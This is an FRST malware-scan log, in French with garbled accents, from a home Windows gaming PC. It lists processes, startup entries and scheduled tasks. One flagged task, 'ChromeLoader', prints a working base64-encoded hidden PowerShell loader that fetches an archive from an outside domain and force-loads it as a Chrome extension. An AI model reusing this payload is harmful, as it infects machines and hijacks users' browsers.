RÃ©sultats d'analyse de  Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
ExÃ©cutÃ© par aston (administrateur) sur DESKTOP-DPVGJIF (Micro-Star International Co., Ltd MS-7B86) (09-01-2022 17:24:33)
ExÃ©cutÃ© depuis C:\Users\aston\OneDrive\Desktop
Profils chargÃ©s: aston
Plate-forme: Microsoft Windows 10 Famille Version 20H2 19042.1415 (X64) Langue: FranÃ§ais (France)
Navigateur par dÃ©faut: Chrome
Mode d'amorÃ§age: Normal

==================== Processus (Avec liste blanche) =================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, le processus sera arrÃªtÃ©. Le fichier ne sera pas dÃ©placÃ©.)

() [Fichier non signÃ©] C:\Program Files (x86)\CoolerMaster\PORTAL\CMService.exe
(Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe
(A-Volute SAS -> A-Volute) C:\Windows\System32\NhNotifSys.exe
(A-Volute SAS -> Nahimic) C:\Windows\System32\NahimicService.exe
(Cooler Master Technology Inc. -> ) C:\Program Files (x86)\CoolerMaster\PORTAL\cm-blackhawk.exe
(Discord Inc. -> Discord Inc.) C:\Users\aston\AppData\Local\Discord\app-1.0.9003\Discord.exe <6>
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EAConnect_microsoft.exe
(Electronic Arts, Inc. -> The Qt Company Ltd.) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\QtWebEngineProcess.exe <2>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <39>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\aston\AppData\Local\Microsoft\OneDrive\21.245.1128.0002\FileCoAuth.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2112.1001.10.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2112.1001.10.0_x64__8wekyb3d8bbwe\XboxPcApp.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(Movavi Software Limited -> ) C:\Users\aston\AppData\Roaming\Movavi Video Suite 22\RouterApplication.exe
(Movavi Software Limited -> Movavi) C:\Users\aston\AppData\Roaming\Movavi Video Suite 22\AgentInformer.exe
(Node.js Foundation -> Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_44dc4eefedc0d082\Display.NvContainer\NVDisplay.Container.exe <2>
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.187.1.13\OverwolfHelper64.exe
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.187.1.13\OverwolfBrowser.exe <3>
(Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe
(Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(Twitch Interactive, Inc. -> Twitch Interactive, Inc.) C:\Users\aston\AppData\Local\Temp\Twitch\Twitch.exe
(Twitch Interactive, Inc. -> Twitch Interactive, Inc.) C:\Users\aston\AppData\Roaming\Twitch\Bin\Electron\TwitchUI.exe <8>
(Twitch Interactive, Inc. -> Twitch Interactive, Inc.) C:\Users\aston\AppData\Roaming\Twitch\Bin\TwitchAgent.exe
(Wacom Co., Ltd. -> Wacom Co. Ltd.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Co., Ltd. -> Wacom Co. Ltd.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Co., Ltd. -> Wacom Co. Ltd.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Co., Ltd. -> Wacom Co. Ltd.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe

==================== Registre (Avec liste blanche) ===================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, l'Ã©lÃ©ment de Registre sera restaurÃ© Ã  la valeur par dÃ©faut ou supprimÃ©. Le fichier ne sera pas dÃ©placÃ©.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3183328 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [70939752 2021-07-06] (Discord Inc. -> Discord Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706344 2021-09-27] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [Discord] => C:\Users\aston\AppData\Local\Discord\Update.exe [1512040 2021-03-18] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [GUDelayStartup] => C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe [44024 2020-01-19] (Glarysoft LTD -> Glarysoft Ltd)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1802072 2021-12-15] (Overwolf Ltd -> Overwolf Ltd.)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [ut] => "C:\Users\aston\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED (Pas de fichier)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize  (Pas de fichier)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [144008 2021-11-06] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-1941571944-215128514-3644642321-1001\...\Run: [movavi_suite_agent] => C:\Users\aston\AppData\Roaming\Movavi Video Suite 22\AgentInformer.exe [972472 2021-12-08] (Movavi Software Limited -> Movavi)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\aston\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Twitch.lnk [2021-04-21]
ShortcutTarget: Twitch.lnk -> C:\Users\aston\AppData\Roaming\Twitch\Bin\Twitch.exe (Twitch Interactive, Inc. -> Twitch Interactive, Inc.)

==================== TÃ¢ches planifiÃ©es (Avec liste blanche) ============

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, il sera supprimÃ© du Registre. Le fichier ne sera pas dÃ©placÃ©, sauf s'il est inscrit sÃ©parÃ©ment.)

Task: {0C1C48FD-1011-4B72-90A3-C8BF8A7A36F4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2019-12-31] (Google LLC -> Google LLC)
Task: {1370E125-4D0A-4B88-A84E-B0866E1C3B82} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2019-12-31] (Google LLC -> Google LLC)
Task: {1487AB6E-A76B-4053-963E-B7FE9AAE646A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {15D92A4D-7EC9-486E-9CF4-7954077B58E7} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {1960845C-AABF-423F-A739-4026F400D4B3} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgB5AGYAbABlAHgAaQBiAGkAbABpAHQAdQBrAHkALgBjAG8AIgAKAAoAJABpAHMATwBwAGUAbgAgAD0AIAAwAAoAJABkAGQAIAA9ACAAMAAKACQAdgBlAHIAIAA9ACAAMAAKAAoAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAdABlAHIAIAAiAG4AYQBtAGUAPQAnAGMAaAByAG8AbQBlAC4AZQB4AGUAJwAiACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoACQBpAGYAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuACIAKQB7AAoACQAJAGIAcgBlAGEAawAKAAkAfQAKAAoACQAkAGkAcwBPAHAAZQBuACAAPQAgADEACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACkAKQB7AAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACgAJAH0ACgAJAGUAbABzAGUAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGMAbwBuAGYAUABhAHQAaAAiACkACgAJAAkACQB7AAoACQAJAAkACQAkAGMAbwBuAGYAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABjAG8AbgBmAFAAYQB0AGgACgAJAAkACQAJACQAYwBvAG4AZgAuAFMAcABsAGkAdAAoACIAOwAiACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkACQAJAAkACQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBkAGQAIgApAAoACQAJAAkACQAJAHsACgAJAAkACQAJAAkACQAkAGQAZAAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0AZQBsAHMAZQBpAGYAIAAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBFAHgAdABlAG4AcwBpAG8AbgBWAGUAcgBzAGkAbwBuACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJAB2AGUAcgAgAD0AIAAkAF8ALgBTAHAAbABpAHQAKAAnACIAJwApAFsAMQBdAAoACQAJAAkACQAJAH0ACgAJAAkACQAJAH0ACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABkAGQAIAAtAGEAbgBkACAAJAB2AGUAcgApAHsACgAKAAoACQAJAAkAdAByAHkAewAKAAoACQAJAAkACQAkAHUAbgAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAHUAbgA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAKAAoACQAJAAkACQBpAGYAKAAkAHUAbgAgAC0ATQBhAHQAYwBoACAAIgAkAGQAZAAiACkAewAKAAkACQAJAAkACQBVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAkAHQAYQBzAGsATgBhAG0AZQAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUACgAJAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlACAALQBSAGUAYwB1AHIAcwBlAAoACQAJAAkACQB9AAoACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwAkAGQAbwBtAGEAaQBuAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwAD8AZABpAGQAPQAkAGQAZAAmAHYAZQByAD0AJAB2AGUAcgAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAAkAfQAKAAkACQAJAGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAKQB7AAoACQAJAAkACQBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAEwAaQB0AGUAcgBhAGwAUABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAZQB4AHQAUABhAHQAaAAiACAALQBGAG8AcgBjAGUACgAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkAfQAKAAoACQAJAH0ACgAKAAkAfQAKAAoACQB0AHIAeQB7AAoACQAJAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAGMAaAByAG8AbQBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBDAGwAbwBzAGUATQBhAGkAbgBXAGkAbgBkAG8AdwAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAH0ACgAJAAkAcwB0AGEAcgB0ACAAYwBoAHIAbwBtAGUAIAAtAC0AbABvAGEAZAAtAGUAeAB0AGUAbgBzAGkAbwBuAD0AIgAkAGUAeAB0AFAAYQB0AGgAIgAsACAALQAtAHIAZQBzAHQAbwByAGUALQBsAGEAcwB0AC0AcwBlAHMAcwBpAG8AbgAsACAALQAtAG4AbwBlAHIAcgBkAGkAYQBsAG8AZwBzACwAIAAtAC0AZABpAHMAYQBiAGwAZQAtAHMAZQBzAHMAaQBvAG4ALQBjAHIAYQBzAGgAZQBkAC0AYgB1AGIAYgBsAGUACgAJAH0AYwBhAHQAYwBoAHsAfQAKAAoAfQA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'Ã©lÃ©ment de donnÃ©es a 4315 caractÃ¨res en plus). (Pas de fichier) <==== ATTENTION
Task: {220E139D-324C-4965-BE39-F2A6A2FA0EDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {46B07FA9-E6CA-402A-95D1-64DD09ADA44D} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {4784783B-27E4-42B9-B3C2-3C37E41BDD6E} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {4BC3B7D4-6AD8-4C2C-BDFD-714C7B0D3046} - System32\Tasks\Opera scheduled assistant Autoupdate 1625605510 => C:\Users\aston\AppData\Local\Programs\Opera\launcher.exe [2264784 2021-06-29] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\aston\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {4CFA316A-A26E-455E-93A5-B879C3A0BAFB} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {6BF3357C-FD80-48CB-B0A5-677B972A1888} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-11-16] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {7EEA40DA-AE60-4CAA-8152-89B64CE9EB87} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {832AEA7D-466B-4E49-8573-C9F5061DD917} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649216 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {959435C1-335F-4C6C-85EA-9EB008721526} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {9AA8068E-9A4A-466D-A899-545EDF6DA790} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {A1C3398A-724D-4007-AF1F-723FA1FBBFFD} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [904904 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {A2F53190-EA6F-4071-A596-EF8FB2B6EA02} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1650384 2021-12-08] (Nvidia Corporation -> NVIDIA Corporation)
Task: {A7721D1D-0377-420E-B05B-E298AC939604} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD)
Task: {AABD878D-7EE5-47DD-B332-EF756D546CB4} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3341312 2021-12-09] (Nvidia Corporation -> NVIDIA Corporation)
Task: {BCFF45DE-E5CA-4D8A-A80E-0CA9E7901746} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C47F6326-EFEC-478F-A0D6-375C7DB9AF6C} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {DD5A5FAC-B7DD-4143-ABB8-1A4A34C5EDAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {E10936F5-66F8-4D98-AD66-C9C248EF13A3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E1C47632-CDD2-47F1-9A92-B4F6BFC61C90} - System32\Tasks\Opera scheduled Autoupdate 1625605507 => C:\Users\aston\AppData\Local\Programs\Opera\launcher.exe [2264784 2021-06-29] (Opera Software AS -> Opera Software)
Task: {FABC7097-2850-46B6-96A0-C721C591929F} - System32\Tasks\BlueStacksHelper => C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe [754472 2021-04-05] (BlueStack Systems, Inc. -> BlueStack Systems, Inc.)
Task: {FBF073CF-CCB9-4AA5-9F04-61B56D142CEE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, le fichier tÃ¢che (.job) sera dÃ©placÃ©. Le fichier exÃ©cutÃ© par la tÃ¢che ne sera pas dÃ©placÃ©.)


==================== Internet (Avec liste blanche) ====================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, s'il s'agit d'un Ã©lÃ©ment du Registre, il sera supprimÃ© ou restaurÃ© Ã  la valeur par dÃ©faut.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ATTENTION (Restriction - Zones)
Hosts: Il y a plus d'un Ã©lÃ©ment dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9a1aca74-856a-4f6c-b01e-9a711b4dd295}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{b705cc5d-2172-4a3d-bade-160307b1dfff}: [DhcpNameServer] 192.168.1.1

Edge: 
=======
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvÃ©(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvÃ©(e)]
Edge DefaultProfile: Default
Edge Profile: C:\Users\aston\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-09]

FireFox:
========
FF Plugin-x32: @java.com/DTPlugin,version=11.311.2 -> C:\Program Files (x86)\Java\jre1.8.0_311\bin\dtplugin\npDeployJava1.dll [2021-12-25] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.311.2 -> C:\Program Files (x86)\Java\jre1.8.0_311\bin\plugin2\npjp2.dll [2021-12-25] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-11-02] (Microsoft Corporation -> Microsoft Corporation)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default [2022-01-09]
CHR DownloadDir: C:\Users\aston\Downloads
CHR Notifications: Default -> hxxps://aternos.org; hxxps://forums.commentcamarche.net; hxxps://www.netflix.com
CHR StartupUrls: Default -> "hxxps://www.google.com/"
